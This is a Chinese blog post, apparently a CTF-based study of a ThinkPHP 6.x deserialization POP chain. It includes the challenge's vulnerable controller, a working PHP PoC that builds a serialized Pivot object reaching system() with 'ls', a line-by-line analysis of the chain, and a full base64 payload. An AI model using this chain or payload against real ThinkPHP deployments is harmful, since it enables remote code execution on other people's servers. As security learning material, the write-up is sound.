php echo return aja62x,从安洵杯学习thinkphp 6.x反序列化POP链

最新推荐文章于 2022-11-02 11:44:25 发布
最新推荐文章于 2022-11-02 11:44:25 发布
阅读量325 收藏
点赞数

ThinkPHP6 反序列化 漏洞分析 POP链 代码执行
关键词由CSDN通过智能技术生成

前言

刚刚过去的安洵杯,里面有一道iamthinking的题目(好像是这个名字吧),里面考察到了tp6的反序列化(通过访问www.zip可以下载源码),按照惯例,我还是没有做出来,我不知道咋绕过那个正则emmmm,给没有做题的大师傅献上关键源码吧,如果有师傅懂,欢迎评论<?php

namespace app\controller;

use app\BaseController;

class Index extends BaseController

{

public function index()

{

echo "test.jpg";

$paylaod = @$_GET['payload'];

if(isset($paylaod))

{

$url = parse_url($_SERVER['REQUEST_URI']);

parse_str($url['query'],$query);

foreach($query as $value)

{

if(preg_match("/^O/i",$value))

{

die('STOP HACKING');

exit();

}

}

unserialize($paylaod);

}

}

}

虽然题没有做出来,但是tp6的反序列化POP链必须学习一波。

PoC献上<?php

namespace think\model\concern;

trait Conversion

{

}

trait Attribute

{

private $data;

private $withAttr = ["axin" => "system"];

public function get()

{

$this->data = ["axin" => "ls"]; //你想要执行的命令,这里的键值只需要保持和withAttr里的键值一致即可

}

}

namespace think;

abstract class Model{

use model\concern\Attribute;

use model\concern\Conversion;

private $lazySave = false;

protected $withEvent = false;

private $exists = true;

private $force = true;

protected $field = [];

protected $schema = [];

protected $connection='mysql';

protected $name;

protected $suffix = '';

function __construct(){

$this->get();

$this->lazySave = true;

$this->withEvent = false;

$this->exists = true;

$this->force = true;

$this->field = [];

$this->schema = [];

$this->connection = 'mysql';

}

}

namespace think\model;

use think\Model;

class Pivot extends Model

{

function __construct($obj='')

{

parent::__construct();

$this->name = $obj;

}

}

$a = new Pivot();

$b = new Pivot($a);

echo urlencode(base64_encode(serialize($b)));

大佬们好像没有放现成的PoC,我这里自己糊弄了一个,大家将就着看吧,下面我们就来看看整个POP链吧。

利用链分析

这次的利用链后半部分也就是__toString()后面的链条都是与tp5.2.x一样的,只是前半条链不一致,奈何我之前只分析过tp5.1.x的,而5.1.x与5.2.x的区别就是后半条链不一致,也就是说tp5.1.x的利用链与tp6.x的利用链完全不一样,而我在准备复现tp5.2.x的pop链时,用composer安装tp5.2.x死活安不上,但是官网上又说5.2只能用composer安装.......

f9ede6d22417b42cf8d07e5fc440084f.png跑去github上提issue,结果官方回复说没有5.2版本了......说出来给各位师傅们避个坑

先列出利用链:think\Model --> __destruct()

think\Model --> save()

think\Model --> updateData()

think\Model --> checkAllowFields()

think\Model --> db()

后半部分利用链(同tp 5.2后半部分利用链)

think\model\concern\Conversion --> __toString()

think\model\concern\Conversion --> __toJson()

think\model\concern\Conversion --> __toArray()

think\model\concern\Attribute --> getAttr()

think\model\concern\Attribute --> getValue()

可以看到我把利用链拆分为了两部分,前面一部分是到有字符串拼接操作为止,后面一部分是从字符串拼接的魔术方法开始,一直到代码执行的触发点。接下来我们就一边梳理利用链,一边构造POC。

Model的__destruct方法public function __destruct()

{

echo "lazySave的值:".$this->lazySave."
";

if ($this->lazySave) {

$this->save();

}

}

这里要执行save方法,需要lazySave=true

跟进save方法,因为我们关注的只是updateData方法,所以updateData后面的代码我就省略掉了:public function save(array $data = [], string $sequence = null): bool

{

// 数据对象赋值

$this->setAttrs($data);

if ($this->isEmpty() || false === $this->trigger('BeforeWrite')) {

return false;

}

$result = $this->exists ? $this->updateData() : $this->insertData($sequence);

xxxxxxxxxxxx

return true;

}

为了能够顺利执行到updateData(),我们需要保证前面的if条件判断不成立($this->isEmpth()==false和$this->trigger()==true)以及$this->exists=true

isEmptypublic function isEmpty(): bool

{

return empty($this->data);

}

只要保证this->data不为空就行

triggerprotected function trigger(string $event): bool

{

if (!$this->withEvent) {

return true;

}

$call = 'on' . Str::studly($event);

try {

if (method_exists(static::class, $call)) {

$result = call_user_func([static::class, $call], $this);

} elseif (is_object(self::$event) && method_exists(self::$event, 'trigger')) {

$result = self::$event->trigger(static::class . '.' . $event, $this);

$result = empty($result) ? true : end($result);

} else {

$result = true;

}

return false === $result ? false : true;

} catch (ModelEventException $e) {

return false;

}

}

看似这么长一串,但是我们只需要令withEvent=false就可以直接发挥true,回到save函数,接下来再令$this->exists==true,然后进入updateData()protected function updateData(): bool

{

echo "updateData执行-----
";

// 事件回调

if (false === $this->trigger('BeforeUpdate')) { // 经过我们之前的设置,这儿直接跳过

return false;

}

$this->checkData();

// 获取有更新的数据

$data = $this->getChangedData();

if (empty($data)) {

// 关联更新

if (!empty($this->relationWrite)) {

$this->autoRelationUpdate();

}

return true;

}

if ($this->autoWriteTimestamp && $this->updateTime && !isset($data[$this->updateTime])) {

// 自动写入更新时间

$data[$this->updateTime] = $this->autoWriteTimestamp($this->updateTime);

$this->data[$this->updateTime] = $data[$this->updateTime];

}

// 检查允许字段

$allowFields = $this->checkAllowFields();

xxxxxxxxx

为了能够调用到checkAllowFields(),还是需要保证前面不直接return,所以$data不能为空,所以我们跟进getChangedData()public function getChangedData(): array

{

$data = $this->force ? $this->data : array_udiff_assoc($this->data, $this->origin, function ($a, $b) {

if ((empty($a) || empty($b)) && $a !== $b) {

return 1;

}

return is_object($a) || $a != $b ? 1 : 0;

});

// 只读字段不允许更新

foreach ($this->readonly as $key => $field) {

if (isset($data[$field])) {

unset($data[$field]);

}

}

return $data;

}

第二个foreach不需要在意,我们这里令$this->force==true直接返回我们之前自定义的非空data,回到updateData(),后面会执行到if判断,但是不影响我们的流程,忽略,这就进入了checkAllowFields()protected function checkAllowFields(): array

{

echo "进入checkAllowFields()函数
";

// 检测字段

if (empty($this->field)) {

if (!empty($this->schema)) {

$this->field = array_keys(array_merge($this->schema, $this->jsonType));

} else {

$query = $this->db();

$table = $this->table ? $this->table . $this->suffix : $query->getTable();

$this->field = $query->getConnection()->getTableFields($table);

}

return $this->field;

}

xxxxxxx

}

为了执行db(),令$this->schema与$this->field为空,进入db()public function db($scope = []): Query

{

echo "进入db()函数
";

/** @var Query $query */

echo "db函数中的变量值如下:
";

echo "connection=".$this->connection."
";

echo "name=";var_dump($this->name);echo "
";

echo "suffix=".$this->suffix."
";

$query = self::$db->connect($this->connection)

->name($this->name . $this->suffix)

->pk($this->pk);

}

在db函数里执行了$this->name.$this->suffix这种字符串拼接操作,但是在这之前需要满足$db->connect()也就是令$this->connection=='mysql',至此前半条链已经完成。我们知道了每个变量的值怎么设置,我们还得找一个合适的类,因为Model类是抽象类,不能实例化,我们找一个他的子类,和tp5.1一样我们还是用Pivot类来构造PoC,不难构造出如下半成品:namespace think;

abstract class Model{

use model\concern\Attribute;

use model\concern\Conversion;

private $lazySave = false;

protected $withEvent = false;

private $exists = true;

private $force = true;

protected $field = [];

protected $schema = [];

protected $connection='mysql';

protected $name;

protected $suffix = '';

function __construct(){

$this->get();

$this->lazySave = true;

$this->withEvent = false;

$this->exists = true;

$this->force = true;

$this->field = [];

$this->schema = [];

$this->connection = 'mysql';

}

}

namespace think\model;

use think\Model;

class Pivot extends Model

{

}

因为前半条链已经来到了$this->name.$this->suffix,那么无论是name还是suffix连接后半条链都是可以的,重要的就是这后半条链从那个类开始,漏洞作者找到Conversion类,其中他的魔术方法__toString如下:public function __toString()

{

return $this->toJson();

}

继续跟toJson:public function toJson(int $options = JSON_UNESCAPED_UNICODE): string

{

return json_encode($this->toArray(), $options);

}

跟进toArray:public function toArray(): array

{

echo "进入toArray函数!!!
";

$item = [];

$hasVisible = false;

foreach ($this->visible as $key => $val) {

xxxxxx

}

foreach ($this->hidden as $key => $val) {

xxxxxx

}

// 合并关联数据

$data = array_merge($this->data, $this->relation); //$data=["axin"=>"ls"]

foreach ($data as $key => $val) {

if ($val instanceof Model || $val instanceof ModelCollection) {

// 关联模型对象

if (isset($this->visible[$key]) && is_array($this->visible[$key])) {

$val->visible($this->visible[$key]);

} elseif (isset($this->hidden[$key]) && is_array($this->hidden[$key])) {

$val->hidden($this->hidden[$key]);

}

// 关联模型对象

if (!isset($this->hidden[$key]) || true !== $this->hidden[$key]) {

$item[$key] = $val->toArray();

}

} elseif (isset($this->visible[$key])) {

$item[$key] = $this->getAttr($key);

} elseif (!isset($this->hidden[$key]) && !$hasVisible) {

$item[$key] = $this->getAttr($key);

}

}

xxxxxx

return $item;

}

根据我最开始给出的poc,$data=["axin"=>"ls"],所以会来到最后一个getAttr()函数处,我们跟进public function getAttr(string $name)

{

echo "进入getAttr函数!!!!
";

try {

$relation = false;

$value = $this->getData($name); // $name='axin'

} catch (InvalidArgumentException $e) {

$relation = $this->isRelationAttr($name);

$value = null;

}

return $this->getValue($name, $value, $relation);

}

如果熟悉tp5.1.x pop链的同学肯定觉得getData的似曾相识,我们一起来看看吧:public function getData(string $name = null)//$name='axin'

{

echo "进入getData函数!!!!
";

if (is_null($name)) {

return $this->data;

}

$fieldName = $this->getRealFieldName($name);

if (array_key_exists($fieldName, $this->data)) {

return $this->data[$fieldName];

} elseif (array_key_exists($fieldName, $this->relation)) {

return $this->relation[$fieldName];

}

throw new InvalidArgumentException('property not exists:' . static::class . '->' . $name);

}

跟进getRealFieldName:protected function getRealFieldName(string $name): string // $name = 'axin'

{

return $this->strict ? $name : Str::snake($name);

}

这里我们可以令$this->strict=true,这样就会发挥‘axin’,回到getData,getData继续执行,也就是$fieldName='axin',最后getData()返回$this->data['axin']也就是返回了'ls'。回到getAttr(),继续执行进入getValue():protected function getValue(string $name, $value, $relation = false)

{

echo "进入getValue函数!!!!
";

// 检测属性获取器

$fieldName = $this->getRealFieldName($name); //$fieldName='axin'

$method = 'get' . Str::studly($name) . 'Attr';

if (isset($this->withAttr[$fieldName])) {

if ($relation) {

$value = $this->getRelationValue($relation);

}

if (in_array($fieldName, $this->json) && is_array($this->withAttr[$fieldName])) {

$value = $this->getJsonValue($fieldName, $value);

} else {

echo "到达代码执行触发点!!!
";

$closure = $this->withAttr[$fieldName]; //这里的withAttr = ["axin"=>"system"]

$value = $closure($value, $this->data);

}

} elseif (method_exists($this, $method)) {

xxxxxx

} elseif (isset($this->type[$fieldName])) {

xxxxx

} elseif ($this->autoWriteTimestamp && in_array($fieldName, [$this->createTime, $this->updateTime])) {

xxxx

} elseif ($relation) {

xxxxxxxxxx

}

return $value;

}

这里顺序执行,默认会执行到$closure = $this->withAttr[$fieldName]; //这里的withAttr = ["axin"=>"system"] ,$filedName='axin'

$value = $closure($value, $this->data);//最终执行system("ls", ["axin"=>"ls"])

可以看到最终是执行了system("ls", ["axin"=>"ls"]),而system函数第二个参数是可选的,也就是这种用法是合法的注:system ( string $command [, int &$return_var ] ) : string参数

command要执行的命令。 return_var如果提供 return_var 参数, 则外部命令执行后的返回状态将会被设置到此变量中。

至此,Tp5.6.x的pop链后半段也结束了。剩下的就是完善刚刚前半段POP链构造的poc了,成品也就是我最开始贴出来的那个,最后看一下我本地调试的效果,当然在调试过程中需要自己构造一个反序列化点,我直接在Index控制器中构造了一个新方法反序列化$_GET[p]:

6f587e0977807a438cda0b87427ecf45.png然后请求/public/index.php/index/unser?p=TzoxNzoidGhpbmtcbW9kZWxcUGl2b3QiOjExOntzOjIxOiIAdGhpbmtcTW9kZWwAbGF6eVNhdmUiO2I6MTtzOjEyOiIAKgB3aXRoRXZlbnQiO2I6MDtzOjE5OiIAdGhpbmtcTW9kZWwAZXhpc3RzIjtiOjE7czoxODoiAHRoaW5rXE1vZGVsAGZvcmNlIjtiOjE7czo4OiIAKgBmaWVsZCI7YTowOnt9czo5OiIAKgBzY2hlbWEiO2E6MDp7fXM6MTM6IgAqAGNvbm5lY3Rpb24iO3M6NToibXlzcWwiO3M6NzoiACoAbmFtZSI7TzoxNzoidGhpbmtcbW9kZWxcUGl2b3QiOjExOntzOjIxOiIAdGhpbmtcTW9kZWwAbGF6eVNhdmUiO2I6MTtzOjEyOiIAKgB3aXRoRXZlbnQiO2I6MDtzOjE5OiIAdGhpbmtcTW9kZWwAZXhpc3RzIjtiOjE7czoxODoiAHRoaW5rXE1vZGVsAGZvcmNlIjtiOjE7czo4OiIAKgBmaWVsZCI7YTowOnt9czo5OiIAKgBzY2hlbWEiO2E6MDp7fXM6MTM6IgAqAGNvbm5lY3Rpb24iO3M6NToibXlzcWwiO3M6NzoiACoAbmFtZSI7czowOiIiO3M6OToiACoAc3VmZml4IjtzOjA6IiI7czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czo0OiJheGluIjtzOjI6ImxzIjt9czoyMToiAHRoaW5rXE1vZGVsAHdpdGhBdHRyIjthOjE6e3M6NDoiYXhpbiI7czo2OiJzeXN0ZW0iO319czo5OiIAKgBzdWZmaXgiO3M6MDoiIjtzOjE3OiIAdGhpbmtcTW9kZWwAZGF0YSI7YToxOntzOjQ6ImF4aW4iO3M6MjoibHMiO31zOjIxOiIAdGhpbmtcTW9kZWwAd2l0aEF0dHIiO2E6MTp7czo0OiJheGluIjtzOjY6InN5c3RlbSI7fX0%3D,可以看到成功执行ls命令,其中那些乱七八糟的输出是我调试时自己echo的,大家在编写反序列化poc时也可以这样一点点确定自己写对了没。

b8d354ed7d444d0357d275479b00db08.png

参考

向大佬们看齐,respect

灵之翼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php parse uri,php parse_url()函数的漏洞 · C1imber’s Blog
weixin_34352633的博客
03-27 775
在ctf比赛中经常遇到的一个知识点,记录一下,由于parse_url函数在解析url时存在的bug导致在某些情况下可以绕过正则的过滤来看代码
从安洵学习thinkphp 6.x反序列化POP
一个安全研究员
02-17 1069
依旧膜拜师傅们
pop php,ThinkPHP 6.x反序列化POP(二)
weixin_39906192的博客
04-01 283
环境准备安装ThinkPHP 6.0composer create-project topthink/think=6.0.x-dev v6.0修改application/index/controller/Index.phpIndex类的代码class Index{public function index(){$payload = unserialize(base64_decode($_GET['...
Thinkphp5.1反序列化漏洞复现
qq_63928796的博客
11-02 1196
最近打ctf总是遇见一些cve,虽然能找到payload但光打payload属实无趣,所以简单看了一点代码审计和thinkphp开发规则后开始跟几个thinkphp的漏洞。
parse_url小结
weixin_42478365的博客
10-06 850
1.parse_url $url = "/baidu.com:80"; $url1 = "/baidu.com:80a"; $url2 = "//pupiles.com/about:1234"; $url3 = "//baidu.com:80a"; var_dump(parse_url($url)); var_dump(parse_url($url1)); var_dump(parse_url($url2)); var_dump(parse_url($url3)); 执行以上代码:,将得到下面的结果
JavaWeb新版教程. JSON和Ajax请求&i18n国际化X-原生JavaScript的AJA.avi
05-17
JavaWeb新版教程. JSON和Ajax请求&i18n国际化X-原生JavaScript的AJA.avi
AJA-Kona3-NDD-8.1.2-aja kona3驱动
最新发布
08-07
从压缩包子文件的文件名称列表来看,只有一个条目"AJA_Kona3_NDD_8.1.2--aja kona3驱动",这很可能是驱动程序的安装包,包含所有必要的文件以在用户的计算机上安装和配置AJA Kona 3的驱动程序。安装这个驱动程序通常...
基于PHP 打听网Wordpress CMS的毕业设计,PHP7.0+MySQL5.7+Wordpress5.0+MVC+Aja
04-10
这篇毕设旨在使用PHP语言开发一个CMS系统,使用Wordpress作为基础框架。Wordpress是一个流行的开源博客平台,拥有丰富的插件和主题,可以方便地扩展和定制网站功能和外观。 本毕设的主要目标是设计和实现一个打听...
asp+ajax.rar_ajax_ajax a_ajax asp_asp aja_asp+ajax
09-14
6. **安全性**:在实现留言板功能时,需要注意防止SQL注入、XSS跨站脚本攻击等安全问题。服务器端的ASP代码需要对用户输入进行适当验证和过滤。 7. **用户体验**:使用AJAX的目的是提高用户体验,因此,合理的进度...
前端项目-aja.zip
09-02
**前端项目-aja.zip** 是一个专注于前端开发的项目,主要涉及的是异步JavaScript和JSON处理,不依赖XML的Ajax技术。这个项目的核心是通过AJAX实现无刷新的数据交互,提高用户体验,使得网页在不完全刷新的情况下能够...
tp5源码分析之模型
An丶的博客
02-23 1979
1 数据模型数据模型(Model) 主要实现对单个数据表的操作,包括数据表整体操作数据表字段操作数据表的数据操作1-1 数据模型的创建Model-&gt;__construct()数据模型的构造函数,创建数据模型对象public function __construct($data = []) { if (is_object($data)) { $t...
ThinkPHP6 模型创建使用
虬川候的博客
07-17 1016
目录 user.php 模型创建 <?php namespace app\model; //引用Model use think\Model; //模型文件和数据表名称相同 class User extends Model { } index.php 模型使用 <?php namespace app\controller; //引用模型 use app\model\User; use app\BaseController; class Index extends Ba
分享一个TP5实现Create()方法的心得
weixin_30889885的博客
08-10 468
在TP5中发现用不了以前3.X的Create()方法,虽然用input更严谨,但是字段比较多的话还是有些不艺术的3.X中的实现方法如下: $Model = D('User'); $Model->create(); $Model->add(); 在仔细阅读了TP5文档后,发现有这么一段: 欣喜之余便测试了一下,发现返回的内容是个类,不能直接做修改,只能接着连贯操作:...
简单暴力的TP5多主题方案
baoba84620的专栏
06-05 568
一个小项目,需要配置多套前端主题。解决的思路是根据域名加载不同的主题配置。 一、在应用目录 application 下创建 common 目录。 二、application/common 目录下创建 HomeBase 控制器。代码如下: <?ph...
TP6基础知识【新框架】
颜夕_
03-25 3823
导读 本章主要讲解了TP5/TP6异同之处,基础的控制器层、模型层的使用,杜绝无效请求让代码更加健壮,数据库层问题排查解决方案,这些内容都是为后续电商实战做完美铺垫。 TP5和TP6的异同之处 目录结构异同 tp5的框架目录在thinkphp,而tp6的框架项目在vendor下,所以tp6就只能用composer 的方式进行安装; 安装方式异同 tp5支持composer安装和官网下载源码安装包,而tp6只支持composer的方式进行安装 类自动加载方式不同 tp6使用composer机制
TP6 模板方式静态化
qq_16088377的博客
12-31 1037
1.建议该方法放在BaseController中,方便全局调用 //静态模板生成目录 protected $staticHtmlDir = ""; //静态文件 protected $staticHtmlFile = ""; /** * 判断是否存在静态 * * @param string $key 静态文件名称,传入,方便出问题时候查看 * @param string $index 静态文件存放一级文件夹 */
解决TP6里initialize里无法重定向的问题
qq_50909707的博客
09-05 1131
最近开始研究tp6框架,发现__initailize()里都不能直接重定向,return也返回不了,经过查找资料发现了解决方案,如下: 通常的redirect('/admin/index/index');在initailize构造函数里并不能被直接调用,需要通过 redirect('/admin/index/index')->send();来传出调用。 加个->send()就有效了,亲测可行。 ...
ThinkPHP V6.0反序列化漏洞复现
WDWAGAAFGAGDADSA的博客
12-11 3842
TP6反序列化漏洞复现
Thinkphp6笔记七:控制器/模型基类配置
qq_29294165的博客
05-08 531
创建基类的目的:创建(应用admin、index、wap)公有部分,方便子类继承,能够各种灵活调用 1.common控制器基类配置 common/controller/CommonBase.php <?php namespace app\common\controller; /** * common控制器基类 * */ class CommonBase { public function __construct() { echo 'CommonBase'.P.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值